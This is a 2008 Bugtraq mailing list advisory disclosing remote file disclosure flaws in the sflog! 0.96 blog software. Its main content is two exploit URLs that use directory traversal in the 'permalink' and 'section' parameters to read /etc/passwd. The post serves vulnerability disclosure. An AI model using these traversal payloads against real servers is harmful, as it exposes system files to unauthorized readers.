Bugtraq mailing list archives

sflog! 0.96 remote file disclosure vulnerabilities


From: "muuratsalo experimental hack lab" <muuratsalo () gmail com>
Date: Thu, 31 Jan 2008 16:50:46 +0100

sflog! 0.96 remote file disclosure vulnerabilities

download   http://sourceforge.net/projects/sflog/

author     muuratsalo
contact   muuratsalo[at]gmail.com

exploits
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd


Current thread: